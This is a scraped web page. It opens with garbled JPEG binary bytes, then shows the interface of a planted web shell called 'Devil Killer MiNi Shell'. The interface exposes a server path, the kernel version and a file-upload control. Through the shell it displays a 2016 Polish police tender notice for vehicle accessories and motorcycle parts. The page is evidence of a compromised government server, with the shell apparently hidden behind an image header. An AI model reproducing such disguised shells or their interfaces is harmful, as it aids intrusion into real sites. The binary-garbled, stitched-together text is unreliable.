JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/42037-N-2016.html

<p class="kh_header"><b>Olsztyn: Sukcesywne dostawy akcesoriów samochodowych, płynów do spryskiwaczy oraz części zamiennych do motocykli i quadów dla KWP w Olsztynie (5 zadań)</b><br>
<b>Numer ogłoszenia: 42037 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Partyzantów 6/8, 10-521 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5225200, 5225760, faks 089 5225205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warminsko-mazurska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy akcesoriów samochodowych, płynów do spryskiwaczy oraz części zamiennych do motocykli i quadów dla KWP w Olsztynie (5 zadań).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy w miarę potrzeb Zamawiającego:
w zadaniu nr 1 - akcesoriów samochodowych,
w zadaniu nr 2 - płynów do spryskiwaczy,
w zadaniu nr 3 - części do motocykli Triumph,
w zadaniu nr 4 - części do motocykli Honda,
w zadaniu nr 5 - części do quadów Polaris
w ilościach i asortymencie określonych w Formularzach cenowych odpowiednio dla zadań nr 1 - 5. 
2. Oferowany asortyment określony w załączniku nr 2 do SIWZ tj. Formularze cenowe dla zadań nr 1-5 muszą  odpowiadać wszystkim parametrom  określonym przez Zamawiającego.
3. Dostarczone płyny do spryskiwaczy powinny być zapachowe (przyjemny, nie drażniący zapach), letnie i zimowe (do minus 22 stopni C), obojętne dla powłok lakierniczych, uszczelek gumowych i  wycieraczek. 
3.1 Termin przydatności płynów do spryskiwaczy nie powinien być krótszy niż 12 miesięcy od daty dostawy.
3.2 Zamawiający wymaga, aby oferowane płyny dostarczane były w oryginalnych opakowaniach producenta, szczelnie zamkniętych i zabezpieczonych przed ewentualnym wyciekiem, o pojemnościach opakowań określonych w Formularzu cenowym dla zadania nr 2  . Na opakowaniu lub etykiecie powinny znajdować się w szczególności następujące informacje: nazwa produktu, nazwa producenta, pojemność oraz data przydatności do użycia.
 3.3. Zamawiający wymaga aby dostarczone płyny do spryskiwaczy zawierały metanol w stężeniu do 3 % wagowych (Rozporządzenie Ministra Gospodarki z dnia 25 września 2013 r. w sprawie ograniczeń produkcji, obrotu lub stosowania substancji i mieszanin niebezpiecznych lub stwarzających zagrożenie oraz wprowadzania do obrotu lub stosowania wyrobów zawierających takie substancje lub mieszaniny Dz.U. z  2014 r., poz. 769).
 3.4 Zamawiający wymaga, aby Wykonawca wraz z pierwszą dostawą płynu letniego i zimowego dostarczył w formie pisemnej aktualne Karty Charakterystyki Produktu Niebezpiecznego. Wykonawca zobowiązuje się okazać na żądanie Zamawiającego aprobaty, atesty lub certyfikaty dostarczanych płynów, o ile takie są wymagane przez obowiązujące prawo.
4. Wymagane jest, aby części zamienne będące przedmiotem zamówienia były dostarczane fabrycznie nowe i kompletne, oryginalne lub alternatywne i były zgodne z Rozporządzeniem Komisji (UE) nr 461/2010 z dnia 27 maja 2010 r. w sprawie stosowania art. 101 ust. 3 Traktatu o funkcjonowaniu Unii Europejskiej do kategorii porozumień wertykalnych i praktyk uzgodnionych w sektorze pojazdów silnikowych.
Części zamienne  - związane z bezpieczeństwem użytkowania pojazdów i ochroną środowiska mogą być montowane w pojazdach, jeżeli spełniony jest co najmniej jeden z następujących warunków:
oznakowane są znakami homologacji międzynarodowej stosowanymi w homologacji Europejskiej Komisji Gospodarczej Organizacji Narodów Zjednoczonych (EKG ONZ) - E lub Unii Europejskiej -e;
oznakowane są cechami producenta pojazdu, na który wystawiono krajowe świadectwo homologacji typu pojazdu; ocechowanie to powinno być zgłoszone do upoważnionej jednostki celem ewidencji;
oznakowane są znakiem zgodności zgodnie z przepisami o systemie oceny zgodności i akredytacji; przepisu nie stosuje się do przedmiotów wyposażenia i części oznakowanych znakiem bezpieczeństwa na podstawie dotychczasowych przepisów o badaniach i certyfikacji,
 wykaz części związanych z bezpieczeństwem użytkowania pojazdu i ochroną środowiska podlegających sprawdzeniu w tym zakresie przez jednostki akredytowane w polskim systemie akredytacji określa załącznik nr 3 do Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia Dz. U. z 2003 r. nr 32 poz.262 z dnia 26 lutego 2003 r. z późn. zm.
Przedmioty wyposażenia i części objęte obowiązkiem homologacji typu określone są w przepisach o homologacji pojazdów.
 Części zamienne oryginalne wprowadzone na rynek przez Producenta pojazdu winny być zapakowane w opakowania koncernu samochodowego z trwałym oznaczeniem jego logo, a wprowadzone na rynek przez producenta części winny być zapakowane w opakowania tego producenta.
4.1  Wykonawca udzieli Zamawiającemu na dostarczone części 12 miesięcznej gwarancji, lecz nie krótszej niż gwarancja  udzielona przez producenta, licząc od dnia dostarczenia towaru Zamawiającemu.
4.2 Na części, dla których producent nie określa terminu gwarancji, odpowiedzialność za jakość dostarczonego towaru przejmuje Wykonawca przez okres 12 miesięcy od daty dostawy do Zamawiającego.
4.3 Wykonawca zobowiązany jest okazać na żądanie Zamawiającego aprobatę, atest lub certyfikat, o ile taki jest wymagany przez obowiązujące przepisy prawa. Wykonawca gwarantuje, że wszedł w posiadanie towaru stanowiącego przedmiot umowy ponosząc z tego tytułu wszelkie opłaty przewidziane prawem.
4.4 Wykonawca zobowiązany jest podać w swojej ofercie producenta oferowanych części samochodowych.
4.5  Dostarczone towary (oleje, smary, płyny eksploatacyjne) muszą spełniać wymagania techniczne, a w szczególności:
muszą odpowiadać wszystkim parametrom określonym w załącznikach Nr 2a-2e do SIWZ - Formularze cenowe dla zadań nr 1-5.
muszą być wyrobem oryginalnym danego producenta,
muszą być dopuszczone do obrotu zgodnie z Polskimi Normami,
muszą być dostarczone w oryginalnych, nienaruszonych, bezzwrotnych opakowaniach 
o pojemnościach  podanych w specyfikacji.
5.1 Wykonawca zobowiązany jest zapewnić na opakowaniach zawierających substancje i preparaty niebezpieczne  etykietę , zgodnie z obowiązującymi przepisami. 
5.2 Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany będzie dostarczyć Zamawiającemu w formie pisemnej Karty Charakterystyki Produktu Niebezpiecznego dostarczanych produktów najpóźniej w dniu pierwszej dostawy.
5.3 W przypadku zmian w Karcie Charakterystyki wprowadzonych, w trakcie realizacji umowy, na skutek pojawienia się nowych istotnych informacji, Wykonawca zobowiązany jest do dostarczenia Zamawiającemu zaktualizowanej Karty Charakterystyki Produktu Niebezpiecznego.
6. Dostarczone akumulatory powinny być:fabrycznie nowe, wyprodukowane w okresie do 12 miesięcy od daty  dostawy, dopuszczone do obrotu, muszą spełniać wszelkie wymagania techniczne z zakresu ochrony środowiska i bezpieczeństwa w użytkowaniu określone w normach prawa publicznego obowiązujących na terenie Polski i UE potwierdzone atestami. 
6.1dostarczone akumulatory  muszą być suche, z dołączonym oddzielnie elektrolitem, wraz z załączoną wypełnioną kartą gwarancyjną gwarancja od daty sprzedaży
6.2  Akumulatory będące przedmiotem zamówienia muszą posiadać minimum 12 miesięczną gwarancję od  daty ich dostawy do Zamawiającego.
6.3 Napięcie, pojemność, biegunowość, rodzaje końcówek biegunowych oraz sposób mocowania i wymiary zaoferowanych akumulatorów muszą być zgodne z parametrami akumulatorów określonych w Formularzu cenowym dla zadania nr  3, 4 i 5.
7. Dostarczone opony powinny być bezdętkowe, fabrycznie nowe, w pierwszym gatunku, wyprodukowane w okresie maksymalnie do 12 miesięcy przed datą dostawy do Zamawiającego oraz dopuszczone do obrotu i stosowania zgodnie z przeznaczeniem na terenie UE.
7.1 Oferowane opony muszą być zgodne z Polskimi Normami (normy państw członkowskich UE) przenoszącymi europejskie normy zharmonizowane oraz muszą spełniać wymagania techniczne z zakresu ochrony środowiska i bezpieczeństwa użytkowania.
7.2 Wykonawca przedstawi Zamawiającemu powyższe świadectwa homologacji (dotyczące poszczególnych typów opon) na jego żądanie w trakcie realizacji umowy. W przypadku, gdy świadectwo homologacji wystawione jest w języku innym niż język polski Wykonawca ma obowiązek dostarczyć dodatkowo tłumaczenie świadectwa homologacji na język polski.
7.3  Przez cały okres trwania umowy wymagana jest jednakowa rzeźba bieżnika dla poszczególnych rozmiarów opon z zastrzeżeniem Rozdziału 17 pkt.17.1 ppkt.1.
7.4 W oferowanych oponach wszelkie parametry i indeksy typu prędkość , nośność, muszą być zgodne z parametrami opon montowanych fabrycznie do quadów określonych w specyfikacji.
7.5 Nie dopuszcza się zamienników rozmiarowych opon podanych w SIWZ.
7.6 Wszystkie dostarczone opony muszą posiadać aktualne certyfikaty, atesty i świadectwa dopuszczenia.
7.7 Zamawiający wymaga aby opony, będące przedmiotem zamówienia, objęte były  1 - roczną gwarancją jakości w okresie od daty dostawy. 
8. Zgodnie z dyspozycją art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać w ofercie przetargowej, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania przez Wykonawcę towarów równoważnych Zamawiający może w trakcie badania i oceny ofert żądać dostarczenia próbek wybranych towarów i dodatkowych, niezbędnych dokumentów - w celu oceny równoważności.
9.  Dostawa asortymentu odbywać się będzie na koszt Wykonawcy.
10.  Wykonawca w swojej ofercie zobowiązany jest podać producenta oraz oznaczenie handlowe oferowanego  asortymentu. Podane w formularzu cenowym oznaczenia występują wyłącznie w celu precyzyjnego określenia  przedmiotu zamówienia.
11. Zamawiający dopuszcza powierzenie części zamówienia podwykonawcom. W takim wypadku Wykonawca ma obowiązek (zgodnie z art. 36 ust.4 ustawy Pzp) zawrzeć w ofercie informacje dotyczące podwykonawstwa. Brak powyższej informacji w ofercie oznaczać będzie, że wykonawca nie będzie korzystał z podwykonawstwa przy realizacji zamówienia.
12.Zamawiający dopuszcza składanie ofert częściowych na dowolną ilość części (zadań)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.30.00.00-0, 39.83.15.00-1, 34.41.10.00-1, 34.22.42.00-5, 34.35.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca zobowiązany jest przed terminem składania ofert wnieść wadium w wysokości:
dla zadania nr 1 - 1 000,00 zł (słownie: jeden tysiąc złotych),
dla zadania nr 2 - 800,00 zł (słownie: osiemset złotych),
dla zadania nr 3 - 900,00 zł (słownie: dziewięćset złotych),
dla zadania nr 4 - 1 000,00 zł (słownie: jeden tysiąc złotych)
dla zadania nr 5 - 900,00 zł (słownie: dziewięćset złotych)
Łącznie: 4 600,00 zł (słownie: cztery tysiące sześćset złotych)
2.W przypadku wnoszenia wadium, w formie innej niż pieniężna, należy do oferty dołączyć jego kopię,a oryginał, w oddzielnym opakowaniu, złożyć w placówce Zamawiającego, wskazanej w Rozdziale 12 
pkt. 2 SIWZ, do czasu składania ofert.
3.Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanym w Rozdziale12 pkt. 1 SIWZ.
4.Wadium może być wnoszone w następujących formach: 
a)w pieniądzu, przelewem na rachunek bankowy Zamawiającego wskazany w Rozdziale I pkt. 1 SIWZ, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że   poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych, 
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 
z późn.zm.).
5.Jeżeli wadium zostanie wniesione w pieniądzu, przelewem na wskazane konto Zamawiającego, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. 
Na poleceniu przelewu należy wpisać: Wadium do przetargu na sukcesywne dostawy akcesoriów samochodowych, płynów do spryskiwaczy oraz części zamiennych do motocykli i quadów dla KWP w Olsztynie (5 zadań) (Z-t-P/5/16) zadanie nr . W pozostałych przypadkach wymagane jest dostarczenie do siedziby Zamawiającego w Olsztynie przy ulicy Partyzantów 6/8 (Sekcja Zamówień Publicznych i Funduszy Pomocowych KWP w Olsztynie) przed upływem terminu składania ofert oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty, o których mowa w punkcie 4. (b) - (e) muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą. Oferta, która nie będzie zabezpieczona na całkowity okres związania ofertą (30 dni od ostatecznego terminu składania ofert) dopuszczalną formą wadium nie będzie rozpatrywana, a wykonawca zostanie wykluczony z postępowania o udzielenie zamówienia publicznego. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis powinien być złożony w sposób umożliwiający jego identyfikację (podpis czytelny lub podpis wraz z imienną pieczątką). Z treści gwarancji musi wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
6.W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data uznania konta Zamawiającego wskazanego w Rozdziale I punkcie 1 SIWZ przed upływem terminu składania ofert.
UWAGA: Wadium w pieniądzu wnosi się przelewem na rachunek bankowy wskazany przez Zamawiającego (art. 45 ust. 7 ustawy Pzp.).
7.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art.46 ust.4a ustawy Pzp.
9.8	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
9.9	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem  terminu składania ofert.
9.10	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9.11	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art.26 ust.3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy Pzp,  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp. lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
9.12	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. posiadania wiedzy i doświadczenia niezbędnych do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania odpowiednim potencjałem technicznym niezbędnym do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca oświadczy, iż spełnia warunek dot. sytuacji ekonomicznej i finansowej niezbędnych do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.1 Zmiana postanowień zawartej umowy w stosunku do treści oferty możliwa jest w następujących przypadkach i na zasadach w nich określonych:
1)  W przypadku zaniechania produkcji przedmiotu umowy lub wystąpienia innych okoliczności niezależnych od Wykonawcy skutkujących tym, że dostarczenie przedmiotu umowy stało się niemożliwe. W przypadku wystąpienia okoliczności, o których mowa wyżej Zamawiający dopuszcza możliwość dostarczenia produktu równoważnego o parametrach użytkowych równych bądź wyższych niż ten zaoferowany w ofercie.
